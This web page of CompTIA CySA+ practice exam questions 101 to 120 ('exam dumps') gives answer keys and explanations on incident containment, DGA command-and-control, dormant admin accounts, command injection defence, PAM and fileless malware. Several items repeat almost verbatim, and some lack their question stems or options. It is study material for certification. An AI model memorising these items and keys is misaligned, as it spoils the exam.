CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 6 Q101-120

Practice Exams:

View All

CompTIA

CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 6 Q101-120

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 101

A SOC analyst observes multiple endpoints sending large amounts of outbound email with unusual attachments to unknown external domains. Which of the following is the FIRST action the analyst should take?

A) Isolate the affected endpoints to stop data exfiltration
B) Implement stricter email spam filtering rules
C) Notify all users about phishing awareness
D) Block outbound SMTP traffic globally

Answer A

Explanation:

A Isolate the affected endpoints to stop data exfiltration

The scenario indicates active data exfiltration, which may be caused by malware or a compromised internal account. The first priority in incident response is containment: stopping ongoing data loss to prevent further exposure of sensitive information. Isolating affected endpoints achieves this by disconnecting compromised systems from the network or limiting their ability to communicate with external hosts. Containment is a critical first step in the incident response lifecycle, followed by eradication, remediation, and recovery.

Isolation also preserves forensic evidence. Analysts can perform detailed investigations on the compromised systems to determine the malware variant, the scope of the compromise, and the attack vector. Preserving this evidence is crucial for root cause analysis and for meeting compliance or regulatory reporting requirements. Rapid containment reduces organizational risk by limiting potential reputational damage, financial loss, or legal liability. In addition, isolating specific systems avoids broad disruptions to legitimate business operations, unlike global measures that may affect all users.

B Implement stricter email spam filtering rules

While strengthening spam filters can prevent future phishing attempts, it does not address ongoing data exfiltration. This action is preventive and secondary to containment.

C Notify all users about phishing awareness

User education is important for long-term risk reduction but does not mitigate an active threat. Awareness campaigns are reactive and cannot stop malware that is already exfiltrating data.

D Block outbound SMTP traffic globally

Blocking all SMTP traffic could stop the exfiltration but would also disrupt legitimate business email operations, causing widespread operational impact. Targeted containment through endpoint isolation is more precise and effective.

Question 102

A network security engineer detects unusual outbound traffic from a host to an external IP over an uncommon port. The host is also initiating numerous DNS queries for randomly generated domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) A distributed denial-of-service attack
C) Standard software update traffic
D) Port scanning activity

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of uncommon outbound connections and frequent DNS queries for randomized domains is indicative of malware using a domain generation algorithm (DGA) for command-and-control (C2) communications. DGAs allow malware to generate numerous pseudo-random domain names dynamically. Attackers leverage this to avoid detection and blocking by traditional domain blacklists. This technique ensures that compromised hosts maintain communication with the C2 infrastructure even if some domains are taken offline or blocked.

Detection of DGA activity involves monitoring DNS query patterns for anomalies. Indicators of compromise include unusually high query volumes, high entropy in domain names, and connections to domains with limited or no historical resolution. Network traffic analysis and endpoint telemetry complement DNS monitoring, helping to identify the infected hosts and the malware variant. Remediation involves isolating affected hosts, blocking malicious domains or IPs, removing malware, and performing forensic analysis. Threat intelligence feeds can aid in identifying known C2 servers or DGA patterns.

B A distributed denial-of-service attack

DDoS attacks aim to overwhelm services with high-volume traffic, whereas this scenario describes covert C2 communication and DNS-based obfuscation rather than volumetric attacks.

C Standard software update traffic

Legitimate updates connect to known servers using predictable ports and do not involve randomized DNS queries.

D Port scanning activity

Port scanning involves probing network ports for open services and does not generate randomized DNS requests or establish covert outbound connections.

Question 103

An analyst identifies that multiple service accounts have not been used for over six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable external SSH connections
D) Deploy full disk encryption on all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive service accounts with administrative privileges present a high-risk scenario. Even if unused, these accounts remain potential attack vectors. Attackers can exploit dormant accounts through stolen credentials, lateral movement, or brute-force attacks. Automated account deprovisioning ensures accounts are disabled or removed after a defined period of inactivity, enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems enhances effectiveness. Automation ensures consistency, reduces human error, and generates logs for compliance with regulatory standards such as HIPAA, PCI DSS, and GDPR. Deprovisioning also reduces the attack surface by eliminating dormant accounts that could be used for post-compromise persistence.

Complementary strategies include multi-factor authentication (MFA), monitoring for unauthorized login attempts, and periodic reviews of account activity. Automated deprovisioning enables proactive management and reduces reliance on reactive measures, such as responding after an account is compromised. Overall, this control strengthens organizational security while streamlining administrative processes and maintaining compliance.

B Increase password complexity requirements for service accounts

Password complexity improves resistance against guessing attacks but does not address the risk of dormant accounts being misused.

C Disable external SSH connections

Restricting SSH mitigates external threats but does not address internal abuse of inactive accounts.

D Deploy full disk encryption on all endpoints

Full disk encryption protects data at rest but does not reduce risks associated with privileged accounts.

Question 104

During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution via unsanitized input parameters. Which of the following controls would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values for web applications
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when user input is executed as part of operating system commands without proper validation or sanitization. Server-side input validation ensures that only expected input patterns, types, and lengths are accepted. Parameterized commands or prepared statements separate input data from executable code, preventing attackers from injecting malicious commands.

Secure coding practices, including input validation, output encoding, and using frameworks that enforce secure handling of user input, are crucial for reducing application-layer vulnerabilities. Static and dynamic application security testing (SAST/DAST) during development helps detect these vulnerabilities early. Web application firewalls (WAFs) can provide an additional layer of protection by filtering malicious requests and blocking known attack patterns.

Behavioral monitoring, logging, and alerting for anomalous input or execution attempts allow early detection of attacks. Remediation includes patching the vulnerable application, reviewing and updating coding standards, and educating developers on secure coding practices. Combining these measures provides a multi-layered defense to prevent command injection, protect sensitive data, maintain system integrity, and comply with frameworks such as PCI DSS or OWASP ASVS.

B Enforce TLS encryption for all web traffic

TLS secures communications in transit but does not mitigate application-layer command injection vulnerabilities.

C Increase session timeout values for web applications

Adjusting session timeouts mitigates session hijacking risks but does not prevent command injection.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect application input and cannot prevent execution of malicious commands from the application layer.

Question 105

A SOC analyst detects that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?

A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

Privileged Access Management with JIT access is a proactive control that minimizes the risk of credential misuse. JIT access grants administrative privileges only for the duration necessary to complete specific tasks, reducing the opportunity for attackers to use stolen credentials to establish reverse shells, move laterally, or maintain persistence. PAM systems provide detailed logging, session monitoring, and auditing, enabling real-time detection of suspicious behavior and supporting forensic investigations.

This approach enforces the principle of least privilege by ensuring users only gain elevated access when required. Integration with multi-factor authentication (MFA) and endpoint monitoring further enhances protection. PAM supports compliance with regulatory standards such as SOX, HIPAA, and PCI DSS, providing auditable records for privileged access. Organizations can also combine PAM with anomaly detection and threat intelligence to detect and respond to unusual access patterns promptly.

B Increase password complexity for all accounts

Strong passwords mitigate brute-force attacks but cannot prevent abuse of already compromised credentials.

C Deploy signature-based antivirus on the server

Traditional antivirus may detect known malware but cannot prevent reverse shells established via legitimate administrative tools.

D Disable all remote access capabilities

Disabling all remote access could disrupt legitimate administrative operations, whereas PAM with JIT provides controlled, secure access without operational disruption.

Question 106

A SOC analyst notices multiple endpoints attempting to connect to suspicious external IP addresses over high-numbered ports. DNS logs indicate a large number of queries to seemingly random domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The scenario indicates malware activity using a domain generation algorithm (DGA). DGAs allow malware to generate numerous pseudo-random domain names dynamically, enabling command-and-control (C2) communications while evading detection through static domain blacklists. The combination of connections over uncommon high-numbered ports and high-frequency DNS queries to seemingly random domains is a hallmark of DGA activity.

Detection requires a combination of behavioral monitoring and analytics. Analysts should evaluate DNS logs for high entropy, random or non-existent domains, and unusual query frequencies. Network traffic analysis complements DNS monitoring, identifying endpoints that exhibit abnormal connection patterns or attempt communication outside standard business operations. Endpoint detection and response (EDR) telemetry can reveal suspicious process executions, memory-resident malware, or scripts initiating these connections.

Mitigation involves isolating affected endpoints, blocking identified malicious domains or IP addresses, and conducting malware removal and forensic analysis. Advanced strategies may include reverse engineering the DGA to predict future domain generation and preemptively blocking potential C2 channels. Threat intelligence feeds provide additional context on known DGA-based malware campaigns. Implementing defense-in-depth—behavioral monitoring, network segmentation, EDR, and threat intelligence—ensures timely detection and containment.

B Standard software update traffic

Legitimate update traffic uses known servers and standard ports. Randomized DNS queries are inconsistent with software update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks involve overwhelming resources to disrupt service and do not typically produce random DNS queries or covert outbound connections.

D Misconfigured internal monitoring system

Misconfigurations may generate unusual traffic, but the combination of external IP connections and high-frequency random DNS queries strongly suggests malicious activity rather than operational misconfiguration.

Question 107

An internal audit reveals that several privileged service accounts have not been used for more than six months but retain administrative access. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts are high-risk because they provide potential avenues for attackers to gain unauthorized access. Automated account deprovisioning removes or disables dormant accounts after a defined period of inactivity, reducing the attack surface. This process enforces the principle of least privilege, ensuring only active users maintain administrative access.

Integration with identity governance and privileged access management (PAM) systems ensures consistent application of deprovisioning policies and generates logs for auditing and compliance. Automated deprovisioning reduces reliance on manual reviews, minimizing human error. Combined with multi-factor authentication (MFA), monitoring, and anomaly detection, deprovisioning strengthens security posture by mitigating the risk of lateral movement and unauthorized access via dormant accounts.

Deprovisioned accounts should be monitored for attempts to reactivate or unauthorized access. By systematically removing dormant privileges, organizations improve operational security and meet compliance requirements for regulatory standards such as HIPAA, PCI DSS, and SOX. Complementary practices include periodic access reviews, monitoring account activity, and enforcing strict access policies to minimize insider threats.

B Increase password complexity for service accounts

While strong passwords reduce brute-force risk, they do not eliminate threats posed by dormant accounts with administrative privileges.

C Disable all external SSH access

SSH restrictions limit remote access but do not address risks from internally compromised or dormant accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not reduce the risk associated with dormant administrative accounts.

Question 108

During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications improperly process user input, allowing execution of arbitrary operating system commands. Server-side input validation ensures that all inputs meet expected formats, types, and lengths, preventing malicious commands from being executed. Parameterized commands or prepared statements separate data from executable code, effectively neutralizing injection attempts.

Secure coding practices, including input validation, output encoding, and the use of secure frameworks, reduce application-layer vulnerabilities. Regular static and dynamic security testing (SAST/DAST) during development helps identify vulnerabilities before deployment. Web application firewalls (WAFs) add an extra layer of protection by filtering malicious requests.

Monitoring and logging suspicious input attempts provide early warnings of potential attacks. Remediation includes patching vulnerable code, implementing secure coding standards, and educating developers on best practices. Together, these measures protect system integrity, sensitive data, and support compliance with security frameworks such as PCI DSS and OWASP ASVS.

B Enforce TLS encryption for all web traffic

TLS encrypts communications but does not mitigate input validation vulnerabilities or command injection risks.

C Increase session timeout values

Session timeouts improve protection against session hijacking but do not address command injection.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect application input and therefore cannot prevent OS-level command execution.

Question 109

A SOC analyst discovers that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access reduces the risk of attacks leveraging stolen credentials by granting administrative privileges only when needed and for limited time periods. By limiting persistent access, JIT prevents attackers from maintaining reverse shells or conducting lateral movement. PAM provides logging, monitoring, and auditing for privileged sessions, allowing real-time detection of anomalous activity.

JIT access enforces least privilege principles while allowing legitimate operations to continue. Multi-factor authentication (MFA) combined with PAM enhances security, and integration with EDR and SIEM solutions enables correlation of access activity with network or system anomalies. This proactive approach prevents attackers from exploiting compromised credentials while maintaining operational efficiency.

B Increase password complexity for all accounts

Strong passwords help resist brute-force attacks but do not prevent attacks using already compromised credentials.

C Deploy signature-based antivirus on the server

Antivirus may detect known malware but is ineffective against reverse shells established through legitimate administrative tools.

D Disable all remote access capabilities

Disabling remote access entirely can disrupt legitimate business functions. PAM with JIT access provides secure, controlled access without operational disruption.

Question 110

A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware resides primarily in memory and uses legitimate system tools, such as PowerShell, WMI, or Office macros, to execute malicious actions. The described scenario—obfuscated scripts communicating with unknown IP addresses—indicates living-off-the-land (LotL) techniques. LotL attacks minimize artifacts on disk, making detection by signature-based antivirus difficult.

Indicators include abnormal script execution, unexpected process spawning, unusual network connections, and deviations from baseline behavior. Detection requires behavioral monitoring, EDR telemetry, and memory forensics. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious activity, and remediating systems. Preventive strategies include application whitelisting, least privilege enforcement, PowerShell logging (module logging, script block logging, transcription), and restricting execution policies.

Network segmentation and threat intelligence integration help identify and block communications with malicious IP addresses. Fileless malware is challenging because it exploits legitimate tools to blend in with normal activity, making defense-in-depth essential. Response procedures must include containment, forensic analysis, and remediation planning. Employee training, anomaly detection, and continuous monitoring further reduce exposure to LotL threats.

B Standard ransomware encrypting files

Ransomware typically encrypts files and displays a ransom note, unlike memory-resident malicious scripts.

C Phishing emails delivering malicious attachments

Phishing may deliver malware initially, but the scenario indicates active post-compromise fileless execution.

D Distributed denial-of-service (DDoS) attack

DDoS attacks target availability and do not involve obfuscated scripts or memory-resident malicious execution.

Question 111

A SOC analyst identifies multiple endpoints sending large amounts of outbound email with unusual attachments to unknown external domains. Which of the following should be the FIRST action the analyst takes?

A) Isolate the affected endpoints to stop data exfiltration
B) Implement stricter email spam filtering rules
C) Notify all users about phishing awareness
D) Block outbound SMTP traffic globally

Answer A

Explanation:

A Isolate the affected endpoints to stop data exfiltration

The primary concern in this scenario is ongoing data exfiltration, potentially caused by malware, compromised credentials, or malicious insiders. Immediate containment is the first step in incident response because it prevents further loss of sensitive data and preserves the integrity of affected systems. Isolating compromised endpoints can involve disconnecting them from the network, blocking certain outbound traffic, or placing them in a quarantined VLAN to stop the exfiltration while allowing controlled investigation.

Containment serves several purposes: it halts the spread of malware, prevents additional data from leaving the organization, and allows forensic investigation. Analysts can capture volatile memory, logs, and other evidence without risk of contamination or destruction by active malicious processes. This evidence is critical for understanding attack vectors, tactics, techniques, and procedures (TTPs) used by the attacker.

During containment, careful communication is essential to avoid panic and maintain operational continuity. Analysts must coordinate with IT teams to ensure critical business functions are maintained while compromised endpoints are isolated. Containment also provides time to prepare remediation steps, including malware eradication, credential resets, system restoration, and user notifications.

Failing to isolate endpoints immediately can result in significant operational, financial, and reputational damage. Attackers could exfiltrate sensitive customer data, intellectual property, or confidential financial information. Isolation is a surgical, targeted measure that stops the threat at its source without impacting the broader user base, unlike broad network-wide measures.

B Implement stricter email spam filtering rules

While strengthening spam filters reduces the likelihood of future phishing attempts or malicious emails, it does not address the current exfiltration. This is a preventive control, secondary to immediate containment.

C Notify all users about phishing awareness

User education is essential for long-term security posture improvement, but it does not mitigate active threats. Notifications are reactive and insufficient when malicious activity is already in progress.

D Block outbound SMTP traffic globally

While blocking all outbound SMTP traffic may prevent exfiltration via email, it disrupts legitimate communications across the organization, impacting critical business operations. Isolation of specific endpoints is more precise and operationally efficient.

Question 112

A network security engineer detects unusual outbound traffic from a host to an external IP over an uncommon port. DNS logs show numerous queries to randomly generated domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) A distributed denial-of-service attack
C) Standard software update traffic
D) Port scanning activity

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed behavior strongly suggests the presence of malware utilizing a domain generation algorithm (DGA) to maintain covert command-and-control (C2) communication. DGAs dynamically generate pseudo-random domain names at regular intervals, allowing malware to contact its C2 infrastructure while evading static blacklists and traditional detection methods. The combination of unusual outbound connections and high-frequency DNS queries to random or high-entropy domains is characteristic of this threat.

Detecting DGA activity requires a multi-faceted approach. DNS logs should be analyzed for patterns indicative of high entropy, randomization, or domains with short lifetimes. Endpoint monitoring and network traffic analysis complement DNS monitoring by highlighting anomalous communication patterns, suspicious processes, or abnormal connections outside expected geolocations or protocols. Behavioral indicators, such as automated scripts, unusual processes, and memory-resident malware, often accompany DGA activity.

Mitigation involves isolating infected endpoints, blocking malicious domains and IP addresses, and removing the malware from compromised hosts. Threat intelligence feeds provide additional context for known DGA patterns and associated malware families. Reverse engineering DGAs can allow security teams to predict future domain generation, proactively blocking communication attempts before the malware successfully contacts its C2 infrastructure.

A layered defense strategy, including endpoint detection and response (EDR), network segmentation, anomaly detection, application whitelisting, and behavior-based analytics, ensures the organization can detect and respond to sophisticated malware campaigns promptly. Analysts should also implement continuous monitoring to detect new infections and prevent lateral movement. Forensic analysis post-containment can identify compromised accounts, assess the scope of the attack, and guide improvements to network and endpoint defenses.

B A distributed denial-of-service attack

DDoS attacks aim to overwhelm resources, causing service degradation or outages. The observed behavior involves covert, targeted communications rather than volumetric traffic, distinguishing it from DDoS activity.

C Standard software update traffic

Legitimate update processes use predictable, known servers and standard ports. Randomized DNS queries and connections over uncommon ports indicate malicious activity, not routine updates.

D Port scanning activity

Port scans involve probing IP addresses to identify open services. They do not generate high-frequency randomized DNS queries or maintain persistent communication channels with external C2 servers.

Question 113

An analyst identifies multiple service accounts that have not been used for over six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable external SSH connections
D) Deploy full disk encryption on all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts present a significant risk to organizational security. Attackers often target such accounts because they are less likely to be monitored and can provide an entry point for lateral movement or post-compromise persistence. Automated account deprovisioning removes or disables accounts after a defined inactivity period, reducing attack surfaces while enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures that deprovisioning policies are consistently applied, and audit logs are generated for regulatory compliance, including HIPAA, PCI DSS, and SOX. Automation minimizes human error, ensuring that no dormant accounts remain active inadvertently. Periodic verification and reporting also allow security teams to maintain visibility over account activity and enforce proactive security practices.

Complementary measures include multi-factor authentication (MFA), continuous monitoring for unauthorized login attempts, and anomaly detection. Automated deprovisioning also supports operational efficiency, enabling administrators to manage large-scale environments with minimal manual intervention while maintaining security. By removing dormant accounts, organizations reduce the likelihood of credential-based attacks, insider threats, and potential regulatory violations.

B Increase password complexity requirements for service accounts

While strong passwords reduce susceptibility to brute-force attacks, they do not mitigate risks associated with inactive accounts that retain administrative privileges.

C Disable external SSH connections

Restricting SSH limits external access but does not address threats from dormant accounts or internal misuse.

D Deploy full disk encryption on all endpoints

Encryption protects data at rest but does not reduce risks posed by dormant administrative accounts.

Question 114

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to properly sanitize user inputs before executing them as operating system commands. Implementing server-side input validation ensures all inputs conform to expected patterns, types, and lengths. Parameterized commands or prepared statements separate user input from executable instructions, neutralizing potential injection attacks.

Secure coding practices—including input validation, output encoding, and proper use of secure frameworks—reduce the likelihood of command injection vulnerabilities. Security testing, such as static (SAST) and dynamic (DAST) application security testing, identifies vulnerabilities during development or staging phases, allowing proactive remediation. Web application firewalls (WAFs) provide additional protection by filtering and blocking malicious requests at the application layer.

Behavioral monitoring and logging for suspicious input activity help detect attempted attacks, enabling rapid response and mitigation. Remediation includes patching vulnerable code, adhering to secure coding standards, and educating developers about secure programming techniques. Combined with proper input validation, these measures protect critical systems, maintain data integrity, and ensure compliance with industry standards, such as PCI DSS and OWASP ASVS.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of communications but does not prevent command injection vulnerabilities at the application layer.

C Increase session timeout values for web applications

Session management mitigates risks like session hijacking but does not address command injection vulnerabilities.

D Add additional firewall rules at the perimeter

Firewalls control network traffic but cannot inspect application-layer input or prevent command execution through vulnerable applications.

Question 115

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

Privileged Access Management (PAM) with JIT access is a proactive control that minimizes the risk of attackers exploiting stolen credentials. JIT ensures administrative privileges are granted only when needed and for a limited duration, reducing the attack window and preventing reverse shells, lateral movement, or persistent access. PAM solutions provide detailed session logging, real-time monitoring, and auditing to detect and respond to anomalous activity quickly.

This control enforces least privilege principles while maintaining operational efficiency. Integration with multi-factor authentication (MFA) strengthens security by ensuring elevated access requires multiple forms of verification. Combining PAM with EDR, SIEM, and threat intelligence allows correlation of activity with anomalous patterns, enabling rapid detection and mitigation of ongoing attacks. PAM also supports compliance with frameworks such as SOX, HIPAA, and PCI DSS by providing auditable records of privileged access.

B Increase password complexity for all accounts

Complex passwords reduce brute-force risks but do not mitigate attacks using already compromised credentials.

C Deploy signature-based antivirus on the server

Antivirus may detect known malware but cannot prevent attacks using legitimate system tools to establish reverse shells.

D Disable all remote access capabilities

Disabling remote access may hinder operational efficiency and business continuity. PAM with JIT access provides controlled, secure access without disrupting legitimate administrative workflows.

Question 116

A SOC analyst notices unusual outbound traffic from several endpoints to external IP addresses over non-standard ports. DNS logs indicate queries to a large number of seemingly random domains. Which of the following BEST describes the threat?

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed scenario strongly indicates malware employing a domain generation algorithm (DGA) for command-and-control (C2) communication. DGAs dynamically create pseudo-random domain names at scheduled intervals to maintain contact between infected endpoints and external C2 servers. This evasion technique helps malware bypass traditional static blacklists, firewalls, and other network security defenses.

Indicators of DGA activity include unusually high DNS query volumes, randomized or high-entropy domain names, and outbound connections to IP addresses over uncommon ports. This behavior is distinct from normal network traffic, as legitimate services typically connect to known hosts on standard ports, and queries resolve predictable domains. Analysts can identify DGA activity using behavioral analytics, anomaly detection, and correlation with threat intelligence feeds to highlight suspicious patterns.

Detection techniques include monitoring DNS query entropy, observing frequency and volume patterns, and comparing domain resolution success rates. Memory-resident malware often triggers DGA communications without leaving persistent disk artifacts, making endpoint detection and response (EDR) telemetry crucial for monitoring process execution, network connections, and system calls. Analysts may also deploy sandboxing and packet inspection tools to observe malware behavior in controlled environments to understand its C2 methodology and communication frequency.

Mitigation requires a multi-layered approach: isolating infected endpoints to prevent further compromise, blocking identified malicious domains and IP addresses, removing malware from affected systems, and conducting forensic investigations. Reverse engineering DGAs allows security teams to preemptively predict future domain generations and block them before malware can reach its C2 infrastructure. Threat intelligence feeds enhance detection by providing insight into known DGA algorithms and associated malware families.

Additional preventive measures include network segmentation to limit lateral movement, anomaly-based detection systems for continuous monitoring, strict egress filtering, and application whitelisting. Educating users about suspicious behaviors, maintaining up-to-date endpoint protections, and continuous monitoring of DNS and network traffic patterns further reinforce defenses. Organizations should establish documented procedures for isolating infected systems, performing incident response, and reporting breaches to ensure coordinated and effective mitigation.

B Standard software update traffic

Software updates typically communicate with known servers over standard ports. Randomized DNS queries or connections to non-standard ports do not align with legitimate update behaviors. Detection of high-entropy, frequent DNS queries strongly differentiates malicious activity from routine update processes.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm services to degrade availability. While high-volume traffic is characteristic of DDoS, the described scenario involves covert, targeted outbound communications and dynamic domain resolution, which is inconsistent with volumetric attack patterns.

D Misconfigured internal monitoring system

Misconfigurations can generate anomalous network traffic, but they rarely produce high-frequency, randomized DNS queries combined with external connections over uncommon ports. The volume, randomness, and targeted nature of the traffic in this scenario strongly indicate malware rather than operational misconfiguration.

Question 117

An internal audit reveals several privileged service accounts have not been used for over six months but still possess administrative rights. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts represent a significant security risk because attackers can exploit dormant credentials to gain unauthorized access or maintain persistence. Automated account deprovisioning systematically disables or removes accounts after a predefined period of inactivity, reducing the attack surface while ensuring enforcement of least privilege. This control is proactive, scalable, and aligns with security governance and compliance requirements.

Integration with identity governance and privileged access management (PAM) systems ensures consistent application of policies, enables audit logging, and simplifies compliance reporting for regulatory standards such as HIPAA, PCI DSS, and SOX. Automated deprovisioning reduces reliance on manual reviews, which are prone to human error, and ensures dormant accounts are consistently removed across large-scale environments.

The process of automated deprovisioning also complements other security controls, including multi-factor authentication (MFA), role-based access control (RBAC), and anomaly detection. Monitoring attempts to reactivate disabled accounts or unauthorized login attempts can provide early warning of potential insider threats or compromised credentials. Organizations can combine automated deprovisioning with periodic account reviews and privilege recertification to maintain a robust security posture.

Automated deprovisioning has operational benefits as well. It reduces administrative overhead, ensures that high-risk accounts are effectively managed, and supports a principle of least privilege by maintaining active access only for users with operational needs. Security teams can focus on monitoring for anomalous behaviors rather than manually tracking dormant accounts, which enhances overall incident response capabilities.

B Increase password complexity requirements for service accounts

Password complexity is a reactive measure and does not mitigate risks associated with dormant or unused accounts. Even strong passwords are ineffective if the account remains active and exposed.

C Disable all external SSH access

SSH restrictions reduce external attack vectors but do not address the risk posed by dormant accounts within the internal network.

D Deploy full disk encryption on all endpoint

Encryption protects data at rest but does not reduce the risk associated with administrative account misuse or dormant privileges.

Question 118

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when user-supplied input is improperly processed and executed by the operating system. Server-side input validation ensures that all inputs conform to expected formats, types, and lengths, effectively preventing malicious commands from executing. Parameterized commands or prepared statements separate user input from executable code, neutralizing injection attempts.

Secure coding practices, including consistent validation and output encoding, reduce vulnerabilities across the application stack. Static and dynamic application security testing (SAST/DAST) identify code weaknesses during development, allowing remediation before deployment. Web application firewalls (WAFs) provide additional protection by filtering malicious inputs at the application layer, offering defense-in-depth against command injection attempts.

Behavioral monitoring is crucial for early detection of malicious activity. Logging input validation failures, anomalous execution attempts, and unexpected command triggers allows analysts to detect attacks in progress. Remediation includes patching vulnerable code, updating frameworks, and implementing secure development training for developers. Periodic penetration testing and security audits validate that controls are effective and vulnerabilities are addressed promptly.

TLS encryption ensures confidentiality in transit but does not address injection vulnerabilities. Session timeout adjustments mitigate session hijacking but do not prevent command injection. Firewalls control network traffic but cannot inspect application-layer inputs; therefore, additional firewall rules alone are insufficient.

The combination of server-side validation, parameterized commands, secure coding practices, WAFs, and continuous monitoring provides a comprehensive mitigation strategy against OS-level command execution attacks. These measures protect system integrity, maintain compliance with security standards, and reduce the risk of data breaches or operational disruption.

Question 119

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access is a proactive control that minimizes the risk of credential misuse. JIT ensures administrative privileges are granted only when needed and for a limited duration, reducing the attack window and preventing attackers from leveraging stolen credentials for reverse shells, lateral movement, or persistence.

PAM systems provide robust session logging, monitoring, and auditing. They allow security teams to detect suspicious activities in real time and maintain an audit trail for compliance with standards like SOX, PCI DSS, and HIPAA. Integration with multi-factor authentication (MFA) enhances security by requiring additional verification steps for privileged access.

JIT access enforces least privilege principles while maintaining operational efficiency. Security teams can apply granular control over which users access which resources, for how long, and under what conditions. Combining PAM with EDR, SIEM, and anomaly detection enables rapid detection and remediation of suspicious activity. PAM provides a controlled environment for administrators, ensuring that even if credentials are compromised, attackers cannot gain persistent elevated access.

B Increase password complexity for all accounts

Strong passwords reduce brute-force risk but do not prevent attacks using already compromised credentials.

C Deploy signature-based antivirus on the server

Traditional antivirus may detect known malware but is largely ineffective against attacks using legitimate system tools, such as reverse shells or living-off-the-land techniques.

D Disable all remote access capabilities

Disabling remote access may hinder legitimate operations. PAM with JIT access allows secure, controlled access without operational disruption, balancing security and business continuity.

Question 120

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware resides primarily in memory and executes malicious actions using legitimate system tools, such as PowerShell, Windows Management Instrumentation (WMI), or Office macros. The scenario describes obfuscated scripts communicating with unknown external IPs without generating detectable files on disk, indicative of living-off-the-land (LotL) techniques.

Fileless malware is particularly difficult to detect with signature-based antivirus solutions because it does not write persistent binaries to disk. Indicators include abnormal script execution, unexpected process creation, unusual network communications, and deviations from baseline system behavior. Behavioral analytics, endpoint detection and response (EDR), and memory forensics are essential for detection.

Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious intent, and remediating compromised systems. Preventive measures involve application whitelisting, enforcing least privilege, enabling PowerShell logging (module logging, script block logging, transcription), and restricting execution policies. Threat intelligence integration allows identification and blocking of malicious domains or IP addresses used for C2 communication.

Living-off-the-land attacks are challenging because they exploit legitimate administrative tools, making detection difficult. Organizations must adopt a defense-in-depth strategy combining proactive monitoring, behavioral analytics, user training, network segmentation, and incident response capabilities. Comprehensive logging, alerting, and correlation of network and endpoint activity are critical for early detection and rapid response.

B Standard ransomware encrypting files

Ransomware typically encrypts files and leaves a ransom note, unlike memory-resident, script-based fileless malware.

C Phishing emails delivering malicious attachment

While phishing may serve as an initial infection vector, the ongoing obfuscated execution indicates post-compromise activity typical of fileless malware.

D Distributed denial-of-service (DDoS) attack

DDoS attacks target availability rather than executing memory-resident scripts or performing covert C2 communications.

Related posts: